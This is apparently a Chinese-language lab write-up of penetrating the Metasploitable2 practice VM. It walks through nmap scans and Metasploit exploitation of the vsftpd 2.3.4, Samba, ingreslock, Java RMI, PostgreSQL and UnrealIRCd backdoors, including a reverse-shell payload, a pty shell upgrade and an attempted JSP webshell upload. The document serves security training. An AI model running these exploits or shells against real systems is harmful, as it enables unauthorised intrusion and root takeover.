开启虚拟机,启用 NAT 模式
nmap 做一下 IP 段扫描,确定 IP 地址为 192.168.74.130
# 信息收集
# Nmap
做一下全端口探测
C:\WINDOWS\system32>nmap -p- 192.168.74.130
Starting Nmap 7.94 ( https://nmap.org ) at 2024-04-03 12:35 中国标准时间
Nmap scan report for bogon (192.168.74.130)
Host is up (0.0027s latency).
Not shown: 65505 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
23/tcp open telnet
25/tcp open smtp
53/tcp open domain
80/tcp open http
111/tcp open rpcbind
139/tcp open netbios-ssn
445/tcp open microsoft-ds
512/tcp open exec
513/tcp open login
514/tcp open shell
1099/tcp open rmiregistry
1524/tcp open ingreslock
2049/tcp open nfs
2121/tcp open ccproxy-ftp
3306/tcp open mysql
3632/tcp open distccd
5432/tcp open postgresql
5900/tcp open vnc
6000/tcp open X11
6667/tcp open irc
6697/tcp open ircs-u
8009/tcp open ajp13
8180/tcp open unknown
8787/tcp open msgsrvr
33203/tcp open unknown
36262/tcp open unknown
46103/tcp open unknown
60596/tcp open unknown
MAC Address: 00:0C:29:B0:8E:3D (VMware)
Nmap done: 1 IP address (1 host up) scanned in 10.59 seconds
挨个端口看过去
# 漏洞利用
# FTP
扫描一下 FTP 端口的详细信息
C:\WINDOWS\system32>nmap -sV -p 21 192.168.74.130
Starting Nmap 7.94 ( https://nmap.org ) at 2024-04-03 12:39 中国标准时间
Nmap scan report for bogon (192.168.74.130)
Host is up (0.00013s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
MAC Address: 00:0C:29:B0:8E:3D (VMware)
Service Info: OS: Unix
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1.24 seconds
看到版本信息是 2.3.4 ,搜索一下相关漏洞
msf6 > search name:ftp version:2.3.4 type:exploit platform:unix
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/http/netwin_surgeftp_exec 2012-12-06 good Yes Netwin SurgeFTP Remote Command Execution
1 exploit/unix/ftp/proftpd_modcopy_exec 2015-04-22 excellent Yes ProFTPD 1.3.5 Mod_Copy Command Execution
2 exploit/unix/ftp/proftpd_133c_backdoor 2010-12-02 excellent No ProFTPD-1.3.3c Backdoor Command Execution
3 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent No VSFTPD v2.3.4 Backdoor Command Execution
4 exploit/unix/http/tnftp_savefile 2014-10-28 excellent No tnftp "savefile" Arbitrary Command Execution
Interact with a module by name or index. For example info 4, use 4 or use exploit/unix/http/tnftp_savefileuse
看到第三个,发现 2.3.4 版本存在后门漏洞,利用一下
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 192.168.74.130
RHOSTS => 192.168.74.130
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > run
[*] 192.168.74.130:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 192.168.74.130:21 - USER: 331 Please specify the password.
[+] 192.168.74.130:21 - Backdoor service has been spawned, handling...
[+] 192.168.74.130:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (192.168.74.1:15165 -> 192.168.74.130:6200) at 2024-04-03 12:41:47 +0800
whoami
root
拿到了 root 权限
使用目标服务器上的 python 获取一个交互式 shell
python -c 'import pty; pty.spawn("/bin/bash")'
root@metasploitable:/# whoami
whoami
root
这段命令是使用 Python 在当前终端会话中创建一个交互式的 Bash shell。下面是对这段命令的解释:
python: 启动 Python 解释器。-c 'import pty; pty.spawn("/bin/bash")': 这部分是作为 Python 解释器的参数传递的一个 Python 命令。其中:
import pty: 导入 Python 的pty模块,pty模块包含了伪终端的功能。pty.spawn("/bin/bash"): 使用pty.spawn()函数在当前终端中启动一个新的 Bash shell (/bin/bash),这样就可以获得一个交互式的 Bash shell,从而可以执行命令和与系统交互。通过执行这段命令,可以在当前终端会话中启动一个交互式的 Bash shell,可以像在普通终端中一样执行命令和与系统进行交互。
这个后门漏洞是在 FTP 进行登陆的时候,如果用户名的结尾是 :) 笑脸,那么就会自动打开 6200 端口后门,可以控制
# SSH
SSH 要进行爆破,没有好用的字典,懒得去爆破,提一嘴用到的工具 hydra 、 Ladon 、 Metasploit 都可以进行
假设我们爆破出来了口令 msfadmin/msfadmin
msf 登录一下
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > search ssh_login
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/ssh/ssh_login normal No SSH Login Check Scanner
1 auxiliary/scanner/ssh/ssh_login_pubkey normal No SSH Public Key Login Scanner
Interact with a module by name or index. For example info 1, use 1 or use auxiliary/scanner/ssh/ssh_login_pubkey
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > use 0
msf6 auxiliary(scanner/ssh/ssh_login) > set RHOSTS 192.168.74.130
RHOSTS => 192.168.74.130
msf6 auxiliary(scanner/ssh/ssh_login) > set USERNAME msfadmin
USERNAME => msfadmin
msf6 auxiliary(scanner/ssh/ssh_login) > set PASSWORD msfadmin
PASSWORD => msfadmin
msf6 auxiliary(scanner/ssh/ssh_login) > run
[*] 192.168.74.130:22 - Starting bruteforce
[+] 192.168.74.130:22 - Success: 'msfadmin:msfadmin' 'uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
[*] SSH session 3 opened (192.168.74.1:20470 -> 192.168.74.130:22) at 2024-04-03 13:32:45 +0800
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
返回到了 session3 了
查看能不能提权
msf6 post(multi/recon/local_exploit_suggester) > set SESSION 3
SESSION => 3
msf6 post(multi/recon/local_exploit_suggester) > run
[*] 192.168.74.130 - Collecting local exploits for linux...
[-] 192.168.74.130 - No suggestions available.
[*] Post module execution completed
没有发现提权方式,可以尝试手动提权,方法很多,晚点再做尝试
# telnet
同样是暴力破解,没有字典,懒得去爆破了,攻击同理,低权限 + 提权
# samba
探测一下 samba 的版本信息
C:\WINDOWS\system32>nmap -p 445 -sV 192.168.74.130
Starting Nmap 7.94 ( https://nmap.org ) at 2024-04-03 13:40 中国标准时间
Nmap scan report for bogon (192.168.74.130)
Host is up (0.00s latency).
PORT STATE SERVICE VERSION
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
MAC Address: 00:0C:29:B0:8E:3D (VMware)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.27 seconds
常用的模块打一下
msf6 exploit(multi/samba/usermap_script) > run
[*] Started reverse TCP handler on 192.168.74.1:4444
[*] Command shell session 4 opened (192.168.74.1:4444 -> 192.168.74.130:34760) at 2024-04-03 13:41:47 +0800
whoami
root
除此之外,通过 smb 匿名访问,可以访问到目录
# 512、513、514
一种协议,我尝试登录发现需要口令 ==、还是走回到爆破去了,不过在看其他人的文章时发现,目标机器应该设置了 ++ ,所有机器都被当做了 friendies 。所以不需要密码可以直接连上去,但是我连不上去,不太理解 ==、
理论上通过 kaili 中的 rlogin 和 rsh 就能无口令连接
# 2049 NFS
靶机开启了 NFS,允许访问文件系统,那么我们可以生成 SSH 密钥,通过挂载目标服务器的方式写入至目标机器的 root 中,这样就能直接登录到 root 账号中。
机器访问有问题,SSH 密钥写入不知道为什么报错,等下复盘
# 1524 端口 ingreslock 后门
这个数据库会在 1524 端口进行监听,有后门,直接 telnet 连上去就可以控制
┌──(root㉿kali)-[~/Desktop]
└─# telnet 192.168.74.130 1524
Trying 192.168.74.130...
Connected to 192.168.74.130.
Escape character is '^]'.
root@metasploitable:/# whoami
root
root@metasploitable:/# root@metasploitable:/#
# 1099 java-rmi 服务
Jva RMI 服务器不安全默认配置 Java 代码执行
参考:https://www.rapid7.com/db/modules/exploit/multi/misc/java_rmi_server/
直接利用吧
msf > use exploit/multi/misc/java_rmi_server
msf exploit(java_rmi_server) > show targets
...targets...
msf exploit(java_rmi_server) > set TARGET < target-id >
msf exploit(java_rmi_server) > show options
...show and set options...
msf exploit(java_rmi_server) > exploit
拿下直接就是 root 权限
# 3306 数据库
数据库账号密码爆破呗,老生常谈了
# 3632 distcc
直接 msf 找漏洞模块利用
use exploit/unix/misc/distcc_exec | |
show options | |
set rhosts 192.168.74.130 | |
run |
我这里又是失败, Exploit failed: Errno::ECONNRESET An existing connection was forcibly closed by the remote host. 被远程主机关闭。原因不明 ==、
# 5432 postgresql 服务
在一些默认的 Linux 安装的 PostgreSQL 中,postgres 服务账户可能会向 /tmp 目录写入数据,同时也可能从那里加载 UDF 共享库,从而允许执行任意代码。该模块编译一个 Linux 共享对象文件,通过二进制注入的 UPDATE pg_largeobject 方法将其上传到目标主机,并从该共享对象创建一个 UDF(用户定义函数)。由于负载作为共享对象的构造函数运行,因此它不需要符合特定的 Postgres API 版本。
msf6 exploit(linux/postgres/postgres_payload) > run
[*] Started reverse TCP handler on 192.168.74.1:4444
[*] 192.168.74.130:5432 - PostgreSQL 8.3.1 on i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.2.3 (Ubuntu 4.2.3-2ubuntu4)
[*] Uploaded as /tmp/yYyZrGxw.so, should be cleaned up automatically
[*] Sending stage (1017704 bytes) to 192.168.74.130
[*] Meterpreter session 6 opened (192.168.74.1:4444 -> 192.168.74.130:41863) at 2024-04-03 14:49:51 +0800
meterpreter >
# 5900 vnc
vnc 服务开启可以尝试爆破,但是!爆破不出来,这个 VNC
# 6697、6667 后门
该模块利用了添加到 Unreal IRCD 3.2.8.1 下载存档中的恶意后门。该后门于 2009 年 11 月至 2010 年 6 月 12 日期间存在于 Unreal3.2.8.1.tar.gz 存档中。
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set RHOSTS 192.168.74.130
RHOSTS => 192.168.74.130
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > run
[-] 192.168.74.130:6667 - Exploit failed: A payload has not been selected.
[*] Exploit completed, but no session was created.
攻击失败,发现是没有找到合适的 payload
手动添加一个上去
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set payload cmd/unix/reverse_perl
payload => cmd/unix/reverse_perl
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set LHOST 192.168.74.1
LHOST => 192.168.74.1
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > run
[*] Started reverse TCP handler on 192.168.74.1:4444
[*] 192.168.74.130:6667 - Connected to 192.168.74.130:6667...
:irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
[*] 192.168.74.130:6667 - Sending backdoor command...
[*] Command shell session 7 opened (192.168.74.1:4444 -> 192.168.74.130:52367) at 2024-04-03 15:11:29 +0800
whoami
root
# 80 端口
dirsearch 扫一下敏感目录
D:\PentestTool\Pentest_ToolBox\Gather_Infomation\dirsearch>dirsearch -u http://192.168.74.130
dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: D:\PentestTool\Pentest_ToolBox\Gather_Infomation\dirsearch\reports\http_192.168.74.130\_24-04-03_15-41-05.txt
Target: http://192.168.74.130/
[15:41:05] Starting:
[15:41:10] 403 - 298B - /.ht_wsr.txt
[15:41:10] 403 - 301B - /.htaccess.bak1
[15:41:10] 403 - 301B - /.htaccess.orig
[15:41:10] 403 - 302B - /.htaccess_extra
[15:41:10] 403 - 303B - /.htaccess.sample
[15:41:10] 403 - 301B - /.htaccess.save
[15:41:11] 403 - 301B - /.htaccess_orig
[15:41:11] 403 - 299B - /.htaccess_sc
[15:41:11] 403 - 299B - /.htaccessBAK
[15:41:11] 403 - 299B - /.htaccessOLD
[15:41:11] 403 - 300B - /.htaccessOLD2
[15:41:11] 403 - 291B - /.htm
[15:41:11] 403 - 292B - /.html
[15:41:11] 403 - 297B - /.htpasswds
[15:41:11] 403 - 301B - /.htpasswd_test
[15:41:11] 403 - 298B - /.httr-oauth
[15:41:52] 403 - 295B - /cgi-bin/
[15:42:04] 200 - 112KB - /doc/
[15:42:05] 302 - 0B - /dvwa/ -> login.php
[15:42:37] 200 - 24KB - /mutillidae/
[15:42:46] 200 - 49KB - /phpinfo.php
[15:42:46] 200 - 49KB - /phpinfo
[15:42:47] 301 - 326B - /phpMyAdmin -> http://192.168.74.130/phpMyAdmin/
[15:42:50] 200 - 4KB - /phpMyAdmin/
[15:42:50] 200 - 3KB - /phpMyAdmin/index.php
[15:43:19] 301 - 320B - /test -> http://192.168.74.130/test/
[15:43:20] 200 - 885B - /test/
[15:43:21] 301 - 324B - /tikiwiki -> http://192.168.74.130/tikiwiki/
Task Completed
有一个 doc 的目录,这个目录遍历直接露完了家人
还有一个 dvwa 的靶场
tikiwiki 是有漏洞的,我前面打过,没利用成功,因为编码器不适配(我猜的
test 是什么我不太理解
看到了 phpinfo ,是 apache 的网站,开启了 CGI。那我不得不提工具干他了
msf > use exploit/multi/http/php_cgi_arg_injection
直接就弹 meterpreter 了
有关 Web 层面的就先不打了,有时间了再温习温习吧
# 8009 ajp
有一个 tomcat 文件包含的漏洞
工具:https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi/
注意该工具需要 Python2 环境
# 8180 Tomcat
构建 war 包上传,他妈构建了传上去不解析啊,郁闷 ==、
我直接打 war 包 jsp 的马
D:\Desktop\1111>jar -cvf 222.war .\
已添加清单
正在添加: 111.jsp(输入 = 855) (输出 = 494)(压缩了 42%)
antsword 连不上去啊 J8
# 小结
主要利用 metasploit 工具对攻击模块的使用
有一些不知道为什么没有攻击成功,知道的哥们给我留言,求你了!
如果还有其他的攻击方式记得 @我
真累
